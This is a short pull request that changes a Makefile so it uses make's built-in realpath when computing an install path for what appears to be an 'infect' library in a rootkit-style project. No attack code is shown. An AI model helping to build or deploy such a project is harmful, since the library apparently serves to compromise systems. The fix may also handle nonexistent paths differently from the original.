### PR TITLE
fix(builder): use realpath make builtin

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -17,7 +17,7 @@ else
 endif
 
 # absolute install path
-BEURK_INFECT_ABSPATH	?= $(shell realpath -m $(BEURK_INFECT_DIR)/$(BEURK_LIBRARY_NAME))
+BEURK_INFECT_ABSPATH	?= $(realpath $(BEURK_INFECT_DIR)/$(BEURK_LIBRARY_NAME))
 
 # compiler options
 INCLUDES	:= -Iincludes


### PR DESCRIPTION
Use realpath make builtin instead of the realpath command (doesn't exist on debian wheezy).
